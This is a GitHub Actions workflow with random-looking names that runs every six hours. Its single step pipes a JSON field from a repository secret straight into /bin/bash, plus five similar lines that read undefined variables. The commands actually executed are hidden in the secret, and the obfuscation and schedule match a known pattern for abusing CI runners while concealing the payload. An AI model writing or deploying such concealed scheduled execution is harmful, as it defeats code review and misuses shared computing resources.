name: yinnengzhe7654
on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinnengzhe7654
        env:
          jnspl97: ${{ secrets.jnspl97 }}
        run: |
          echo $jnspl97 | jq -r .nw0651 | /bin/bash
          echo $oe55 | jq -r .n64 | /bin/bash
          echo $ug886 | jq -r .ln1924 | /bin/bash
          echo $mhyvh9453 | jq -r .bqlds879 | /bin/bash
          echo $sjllv4 | jq -r .jyuue54 | /bin/bash
          echo $dj30287 | jq -r .j5924 | /bin/bash

